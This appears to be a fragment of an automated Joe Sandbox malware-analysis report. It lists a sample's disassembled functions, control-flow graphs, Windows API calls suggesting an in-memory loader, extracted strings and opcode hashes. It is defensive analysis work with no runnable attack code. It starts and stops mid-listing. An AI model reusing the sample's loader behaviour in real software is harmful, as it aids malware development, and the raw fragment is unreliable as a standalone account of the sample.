284->239
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1856074169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1856074169.000000000044A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_5Dw2hTQmiB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: M.C$-Uk$@-t#$U=^3$e!}'$l9h?$m1w7$}%m;
                                                                        • API String ID: 0-2617895959
                                                                        • Opcode ID: 4b2a88b17bf63ebd726796316bdd37616980c87f06edcf3f2fc2e4daba1c62b3
                                                                        • Instruction ID: 87eb36321ec09d9b3df0e99b7a0e046060a02d9914ae414ceb22da4e37e7cf2a
                                                                        • Opcode Fuzzy Hash: 4b2a88b17bf63ebd726796316bdd37616980c87f06edcf3f2fc2e4daba1c62b3
                                                                        • Instruction Fuzzy Hash: 63F137B5200B00CBE328CF25D891B67B7E1FB49705F548A6DD5DA8BAA1EB74F441CB44
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00425183 Relevance: 8.1, APIs: 2, Strings: 2, Instructions: 1113COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1856074169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1856074169.000000000044A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_5Dw2hTQmiB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: = 'Q$cfbe
                                                                        • API String ID: 0-911374196
                                                                        • Opcode ID: 6d61d4dcef794e29638592454722497267c9adfd5ffa75ec27e31235a934c28e
                                                                        • Instruction ID: bb3565213d9b5af794c0b6c16da6f42ae929365bcb1d7bd06dd9ed2123aaf00f
                                                                        • Opcode Fuzzy Hash: 6d61d4dcef794e29638592454722497267c9adfd5ffa75ec27e31235a934c28e
                                                                        • Instruction Fuzzy Hash: B8924970245B908EE726CB35D494BE3BBE1BF17344F84099DD4EB8B282C77AA405CB55
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00409D20 Relevance: 6.7, Strings: 5, Instructions: 468COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 501 409d20-409d33 502 409d35-409d41 501->502 503 409d87-409d89 501->503 504 409d43-409d45 502->504 505 409d8e-409d9b 502->505 506 40a45f-40a468 503->506 507 409d47-409d85 504->507 508 409d9d-409da4 504->508 509 409dd2-409e62 call 406c20 call 433fb0 call 4359f0 505->509 511 409da6-409dbb 507->511 508->511 512 409dbd-409dcd 508->512 518 409ec1-409f18 call 409580 509->518 519 409e64 509->519 511->509 512->509 523 409f45-409fa2 call 409580 518->523 524 409f1a 518->524 520 409e70-409ebf 519->520 520->518 520->520 528 40a002-40a04c call 409580 523->528 529 409fa4 523->529 525 409f20-409f43 524->525 525->523 525->525 533 40a088-40a0d4 528->533 534 40a04e-40a04f 528->534 530 409fb0-40a000 529->530 530->528 530->530 536 40a0d6 533->536 537 40a118-40a17a call 409580 533->537 535 40a050-40a086 534->535 535->533 535->535 538 40a0e0-40a116 536->538 541 40a1c2-40a369 call 409870 537->541 542 40a17c-40a17f 537->542 538->537 538->538 546 40a39a-40a3df 541->546 547 40a36b 541->547 544 40a180-40a1c0 542->544 544->541 544->544 549 40a3e1 546->549 550 40a42a-40a44a call 40e180 call 408c90 546->550 548 40a370-40a398 547->548 548->546 548->548 551 40a3f0-40a428 549->551 555 40a44f-40a458 550->555 551->550 551->551 555->506
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1856074169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1856074169.000000000044A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_5Dw2hTQmiB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 0$Y!N#$b$j$tQpS
                                                                        • API String ID: 0-1561506603
                                                                        • Opcode ID: fbdca97d7b5b8bd9867f2ab60e92d600497daf09618555274c6545db3ae8f586
                                                                        • Instruction ID: 77bbfa77775ed737320afc19213c5ed02593b238c67c5d09a0c0deb4d33d9e09
                                                                        • Opcode Fuzzy Hash: fbdca97d7b5b8bd9867f2ab60e92d600497daf09618555274c6545db3ae8f586
                                                                        • Instruction Fuzzy Hash: 221212B02083819BE324CF15C4A4B5BBBE2BBC6308F545D2DE4D59B392D779D8098B96
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00404C40 Relevance: 5.5, Strings: 4, Instructions: 498COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 556 404c40-404c62 call 408c80 559 404c68-404cb3 556->559 560 40530f-405318 556->560 561 404cb5-404cbd 559->561 562 404cbf-404cc4 call 408c80 559->562 561->562 564 404cc9-404cd2 562->564 565 405155-40515e call 408c90 564->565 566 404cd8-404ced 564->566 565->560 567 404d01-404d0a 566->567 569 404d40-404d44 567->569 570 404d0c-404d11 567->570 574 404d6e-404d79 569->574 572 404cf0 570->572 573 404d13-404d17 570->573 575 404cf2-404cfb 572->575 576 404d24-404d2c 573->576 574->575 575->567 577 404d7e-404d85 575->577 578 404d20-404d22 576->578 579 404d2e-404d33 576->579 580 404d87 577->580 581 404d8c-404deb 577->581 578->576 582 404d50-404d5f call 408ca0 578->582 579->578 580->581 583 404e03-404ed9 call 408d00 * 2 581->583 584 404ded-404e00 call 408d00 581->584 582->572 591 404d61-404d69 582->591 594 404f6b-404f88 call 4034f0 583->594 595 404edf-404ef2 583->595 584->583 591->574 601 405163-405164 594->601 602 404f8e-405125 594->602 597 404f41-404f65 call 4034f0 595->597 603 404f00-404f3f call 4034f0 597->603 604 404f67-404f69 597->604 607 405248-40525e call 408c90 * 2 601->607 605 405127-40512c 602->605 606 405169-40516b 602->606 603->594 603->597 604->603 609 405144-40514c 605->609 610 40512e 605->610 608 40518b-4051c7 606->608 607->560 613 4051c9 608->613 614 40522d-40522f 608->614 616 405140-405142 609->616 617 40514e-405153 609->617 615 40523a-405244 610->615 620 4051d0-40522b 613->620 621 405231-405234 614->621 622 405263-405265 614->622 615->607 616->609 623 40516d-405179 call 408ca0 616->623 617->616 620->614 620->620 627 405236-405238 621->627 628 405267-40527c 621->628 625 4052bc-40530b call 408c90 622->625 623->615 633 40517f-405187 623->633 625->560 631 40527e-405281 627->631 628->631 631->625 634 405283-405287 631->634 633->608 636 405290-4052ba 634->636 636->625 636->636
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1856074169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1856074169.000000000044A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_5Dw2hTQmiB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: )$IDAT$IEND$IHDR
                                                                        • API String ID: 0-3181356877
                                                                        • Opcode ID: 19e6f5fee86a7e1fe3a857782d46b5571d19196f1eafc9465c578561390ea675
                                                                        • Instruction ID: fe1b02779fe56d885984c732abcae5c2a42858581af89089d88e4c468a1f6449
                                                                        • Opcode Fuzzy Hash: 19e6f5fee86a7e1fe3a857782d46b5571d19196f1eafc9465c578561390ea675
                                                                        • Instruction Fuzzy Hash: B312BEB16083508FD704CF28D89472A7BE0EF85304F1585BEE985AB3D2D779D909CB9A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004384D6 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 637 4384d6-43858a call 439a30 * 3 644 4385d4-4385d9 637->644 645 43858c-43858f 637->645 648 4385df 644->648 649 4383ad-438461 call 439a30 * 3 644->649 646 438590-4385d2 645->646 646->644 646->646 656 438463 649->656 657 4384b4-4384b9 LoadLibraryW 649->657 658 438470-4384b2 656->658 659 4384c0-4384d3 657->659 660 4384bb 657->660 658->657 658->658 660->659
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1856074169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1856074169.000000000044A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_5Dw2hTQmiB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: D1B7$D1B7
                                                                        • API String ID: 0-2576811906
                                                                        • Opcode ID: 60bdf6df0d9da367abe9cafd864840737e1feb61e3c6acb89e3bd56984f3b0f9
                                                                        • Instruction ID: 227d40b3051d5b9f1c8533b328a387a81ecb6462684d2791c386ca89a2a782a0
                                                                        • Opcode Fuzzy Hash: 60bdf6df0d9da367abe9cafd864840737e1feb61e3c6acb89e3bd56984f3b0f9
                                                                        • Instruction Fuzzy Hash: BE516CB4518301ABD708DF10D9A172FBBE2BBCA708F04992CE48547351E7B88D05EB8A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00415B57 Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 431COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1856074169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1856074169.000000000044A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_5Dw2hTQmiB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: v
                                                                        • API String ID: 0-1801730948
                                                                        • Opcode ID: 233739d0e7ffd3f581b2dd250cda54125e3c87964c33640d052a77960d3d9fd8
                                                                        • Instruction ID: c80b823732e71f4cdd7a44ad5e5a1a1d83ce3d0079143c9f8b25ab05eee7cb54
                                                                        • Opcode Fuzzy Hash: 233739d0e7ffd3f581b2dd250cda54125e3c87964c33640d052a77960d3d9fd8
                                                                        • Instruction Fuzzy Hash: 69E1DFB15083419FD324CF14C48179FBBE2AFD5308F588A6EE4998B392E739D845CB96
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 02FA3E16 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02FA3E3E
                                                                        • Module32First.KERNEL32(00000000,00000224), ref: 02FA3E5E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1857426384.0000000002FA3000.00000040.00000020.00020000.00000000.sdmp, Offset: 02FA3000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2fa3000_5Dw2hTQmiB.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                        • String ID:
                                                                        • API String ID: 3833638111-0
                                                                        • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                        • Instruction ID: 4196bda73bd9c7e712aaacd0fc36e1e1cfe3426400dd366c10748700131fd925
                                                                        • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                        • Instruction Fuzzy Hash: D6F06275600710ABD7203AB998DCB6F76ECEF496A5F100568E743914C0DB70E8494B61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00421F80 Relevance: 2.9, Strings: 2, Instructions: 369COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1856074169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1856074169.000000000044A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_5Dw2hTQmiB.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID: A\]D$vSUN
                                                                        • API String ID: 2994545307-3118794373
                                                                        • Opcode ID: 88702c84c2de185a3db6dfc8e970350103e928544a5b5a69d969cbb7f2465319
                                                                        • Instruction ID: 035f47e295922484c15501f127bff06197c6eb06fd4f10a441f5a1a71ebf76b5
                                                                        • Opcode Fuzzy Hash: 88702c84c2de185a3db6dfc8e970350103e928544a5b5a69d969cbb7f2465319
                                                                        • Instruction Fuzzy Hash: 58C1EEB1608361AFD710CF18D580B2BB7E1FB99318F54892EE5C497342D3B9D905CB9A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004212B0 Relevance: 2.8, Strings: 2, Instructions: 263COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1856074169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1856074169.000000000044A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_5Dw2hTQmiB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: s}$EBC
                                                                        • API String ID: 0-541026534
                                                                        • Opcode ID: fb2f0fbeb1042633251d49655d5c2928f3e20c5a302b4eecd125761bc4d1844e
                                                                        • Instruction ID: d7b96847a59d0831858f5b8d16e64329f0c99a4ad7ef32cd16afe207355252a1
                                                                        • Opcode Fuzzy Hash: fb2f0fbeb1042633251d49655d5c2928f3e20c5a302b4eecd125761bc4d1844e
                                                                        • Instruction Fuzzy Hash: AB91A5B06083518BD724CF14D89076BBBF1FF92358F548A1DE4A68B391E378D909CB96
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00435ACB Relevance: 1.5, APIs: 1, Instructions: 41memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00435B5D
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1856074169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1856074169.000000000044A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_5Dw2hTQmiB.jbxd
                                                                        Similarity
                                                                        • API ID: FreeHeap
                                                                        • String ID:
                                                                        • API String ID: 3298025750-0
                                                                        • Opcode ID: f21a35c5c3999f510f2e72610054c5e10ecc36b1628d5fe1b25180f555448144
                                                                        • Instruction ID: ed305ee78db003560d5c2f81a7b8d567382a75ce1c99dc0f9374550bddc06ea8
                                                                        • Opcode Fuzzy Hash: f21a35c5c3999f510f2e72610054c5e10ecc36b1628d5fe1b25180f555448144
                                                                        • Instruction Fuzzy Hash: 0611E2705083419FE708CF10D46476BFBA1EBC5318F108A1DE8A92B681C379D90ACB86
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00435B70 Relevance: 1.5, APIs: 1, Instructions: 16libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LdrInitializeThunk.NTDLL(0043A5F6,005C003F,00000006,00120089,?,00000018,gxyz,?,0041518F), ref: 00435B9D
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1856074169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1856074169.000000000044A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_5Dw2hTQmiB.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 8bfd55fa9a3783dde79afca9779d4b7cf76278c514d5c7b39b661a11ebe4b8a8
                                                                        • Instruction ID: e4f63ef377a97c2914c676668e3278340bf37c640bd7ba7daadddd8153819c93
                                                                        • Opcode Fuzzy Hash: 8bfd55fa9a3783dde79afca9779d4b7cf76278c514d5c7b39b661a11ebe4b8a8
                                                                        • Instruction Fuzzy Hash: 26E0B675509606EBDA05DF45C14051FF7E2BFC4714FA5C88DE88463204C7B4BD45DA42
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0043AE30 Relevance: 1.5, Strings: 1, Instructions: 257COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1856074169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1856074169.000000000044A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_5Dw2hTQmiB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: gxyz
                                                                        • API String ID: 0-2474275795
                                                                        • Opcode ID: fc42b19fcbf5dc93736857c61726250e5a960fb9e9b4c765051d8721e5bfe42f
                                                                        • Instruction ID: e7b234e54a7d762bb6a3bd1b4f03db8f12db98f9d7bb1013814233ca64f7ddf6
                                                                        • Opcode Fuzzy Hash: fc42b19fcbf5dc93736857c61726250e5a960fb9e9b4c765051d8721e5bfe42f
                                                                        • Instruction Fuzzy Hash: F281CA72A043129BD714CF14C8A0B6BB3A1FF88364F25991EE9955B391D338EC15CB9A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0043B800 Relevance: 1.5, Strings: 1, Instructions: 221COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1856074169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1856074169.000000000044A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_5Dw2hTQmiB.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID: gxyz
                                                                        • API String ID: 2994545307-2474275795
                                                                        • Opcode ID: 44aced7d397eb99cd012382609708791740dc52939a68020d83e326520aa06b6
                                                                        • Instruction ID: d5821ae3abbd5b49496d0d32a43c6cb899c31e2747818077e51798368a7f3181
                                                                        • Opcode Fuzzy Hash: 44aced7d397eb99cd012382609708791740dc52939a68020d83e326520aa06b6
                                                                        • Instruction Fuzzy Hash: FB81DD71608302AFD718CF14D890B2BBBA5EF89354F18991DE9958B391D338E945CBC6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00415390 Relevance: 1.3, Strings: 1, Instructions: 85COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1856074169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1856074169.000000000044A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_5Dw2hTQmiB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 789:
                                                                        • API String ID: 0-2924019492
                                                                        • Opcode ID: 10cc4ab24c7f48d7c6fa18d5fa84f84423c8fc5c7e04cbeddc6c84a1160124f3
                                                                        • Instruction ID: 3d07bc301c4762b4c6ee5a7646427adc52170538d6ac221be9eba05a27c8a57f
                                                                        • Opcode Fuzzy Hash: 10cc4ab24c7f48d7c6fa18d5fa84f84423c8fc5c7e04cbeddc6c84a1160124f3
                                                                        • Instruction Fuzzy Hash: AA218E78210A40CFE728CF14D8A0B67B3A2FF8A349F64492DD5C647B91E775B841CB49
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00417239 Relevance: .3, Instructions: 310COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1856074169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1856074169.000000000044A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_5Dw2hTQmiB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 39a9474f83705d2a35e3a7ed89a71eb199a025ff3331637dbb258dee97e69e13
                                                                        • Instruction ID: 86805473c38cceb78552a0540260a6a94279074ff3da8f2079f33daa4ad5654a
                                                                        • Opcode Fuzzy Hash: 39a9474f83705d2a35e3a7ed89a71eb199a025ff3331637dbb258dee97e69e13
                                                                        • Instruction Fuzzy Hash: D1C141B0510B008BD725CF20C4A46A7BBF2FF85314F545E1DD5A74BAA1D778E54ACB88
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00414F10 Relevance: .1, Instructions: 146COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1856074169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1856074169.000000000044A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_5Dw2hTQmiB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 54cb5dd5dd0fcd48ab24a72492a27802d376ea6492d2a81bec40712d4bc4f415
                                                                        • Instruction ID: 57d970a1a5eaa07e00c5266ac3b256e7819b63f8173c30f7784ac52c659ae5f7
                                                                        • Opcode Fuzzy Hash: 54cb5dd5dd0fcd48ab24a72492a27802d376ea6492d2a81bec40712d4bc4f415
                                                                        • Instruction Fuzzy Hash: 574117B1908304DBD320AF54D8807A7B7E8EFD5314F09466AE89947381E779D885C39A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0042A936 Relevance: .0, Instructions: 22COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1856074169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1856074169.000000000044A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_5Dw2hTQmiB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 61828c0bb65060645607b7bcf0ba44af168b99c9bcfbadb5323aba25d4cd7529
                                                                        • Instruction ID: 235f7b0fceadf091eafc56df715b5c09dc53dff0cccafe78ca5562ce20de9adc
                                                                        • Opcode Fuzzy Hash: 61828c0bb65060645607b7bcf0ba44af168b99c9bcfbadb5323aba25d4cd7529
                                                                        • Instruction Fuzzy Hash: 38F0D4B5508381CFD320DF25C94574BBBE5BBC4304F15C92EE88587291D7B9A406CF8A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0042A245 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 83memoryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 6 42a245-42a333 7 42a375-42a3dd SysAllocString 6->7 8 42a335 6->8 11 42a3e7-42a413 7->11 9 42a337-42a371 8->9 9->9 10 42a373 9->10 10->7
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1856074169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1856074169.000000000044A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_5Dw2hTQmiB.jbxd
                                                                        Similarity
                                                                        • API ID: AllocString
                                                                        • String ID: !$%$3$6$:$;$D
                                                                        • API String ID: 2525500382-2591950249
                                                                        • Opcode ID: 511d7fbf50cccccdc7858a347d8d5263d77f1ec6d27186fb6dd458a649bd9444
                                                                        • Instruction ID: 963f1b3e5fd6771a7d36494be66c3600f40f07d37cb3ae169d65202430aa07ab
                                                                        • Opcode Fuzzy Hash: 511d7fbf50cccccdc7858a347d8d5263d77f1ec6d27186fb6dd458a649bd9444
                                                                        • Instruction Fuzzy Hash: 5941B07010CBC18ED331CB29C89878BBBE1ABD6315F044A5DE4E98B391C779950ACB57
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 02EE003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 18 2ee003c-2ee0047 19 2ee004c-2ee0263 call 2ee0a3f call 2ee0e0f call 2ee0d90 VirtualAlloc 18->19 20 2ee0049 18->20 35 2ee028b-2ee0292 19->35 36 2ee0265-2ee0289 call 2ee0a69 19->36 20->19 38 2ee02a1-2ee02b0 35->38 39 2ee02ce-2ee03c2 VirtualProtect call 2ee0cce call 2ee0ce7 36->39 38->39 40 2ee02b2-2ee02cc 38->40 47 2ee03d1-2ee03e0 39->47 40->38 48 2ee0439-2ee04b8 VirtualFree 47->48 49 2ee03e2-2ee0437 call 2ee0ce7 47->49 51 2ee04be-2ee04cd 48->51 52 2ee05f4-2ee05fe 48->52 49->47 54 2ee04d3-2ee04dd 51->54 55 2ee077f-2ee0789 52->55 56 2ee0604-2ee060d 52->56 54->52 61 2ee04e3-2ee0505 LoadLibraryA 54->61 59 2ee078b-2ee07a3 55->59 60 2ee07a6-2ee07b0 55->60 56->55 57 2ee0613-2ee0637 56->57 62 2ee063e-2ee0648 57->62 59->60 63 2ee086e-2ee08be LoadLibraryA 60->63 64 2ee07b6-2ee07cb 60->64 65 2ee0517-2ee0520 61->65 66 2ee0507-2ee0515 61->66 62->55 69 2ee064e-2ee065a 62->69 74 2ee08c7-2ee08f9 63->74 67 2ee07d2-2ee07d5 64->67 68 2ee0526-2ee0547 65->68 66->68 70 2ee07d7-2ee07e0 67->70 71 2ee0824-2ee0833 67->71 72 2ee054d-2ee0550 68->72 69->55 73 2ee0660-2ee066a 69->73 75 2ee07e4-2ee0822 70->75 76 2ee07e2 70->76 80 2ee0839-2ee083c 71->80 77 2ee0556-2ee056b 72->77 78 2ee05e0-2ee05ef 72->78 79 2ee067a-2ee0689 73->79 81 2ee08fb-2ee0901 74->81 82 2ee0902-2ee091d 74->82 75->67 76->71 83 2ee056f-2ee057a 77->83 84 2ee056d 77->84 78->54 85 2ee068f-2ee06b2 79->85 86 2ee0750-2ee077a 79->86 80->63 87 2ee083e-2ee0847 80->87 81->82 89 2ee057c-2ee0599 83->89 90 2ee059b-2ee05bb 83->90 84->78 91 2ee06ef-2ee06fc 85->91 92 2ee06b4-2ee06ed 85->92 86->62 93 2ee084b-2ee086c 87->93 94 2ee0849 87->94 101 2ee05bd-2ee05db 89->101 90->101 95 2ee06fe-2ee0748 91->95 96 2ee074b 91->96 92->91 93->80 94->63 95->96 96->79 101->72
                                                                        APIs
                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02EE024D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1857268208.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2ee0000_5Dw2hTQmiB.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID: cess$kernel32.dll
                                                                        • API String ID: 4275171209-1230238691
                                                                        • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                        • Instruction ID: 7044c0158e5495c91b6809575acef253c8493cedd29197697cac51bb82bb7e9e
                                                                        • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                        • Instruction Fuzzy Hash: C0526A74A01229DFDB64CF98C985BACBBB1BF09314F1480D9E54EAB351DB70AA85CF14
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040D5D0 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 399COMMON
                                                                        Download Yara Rule

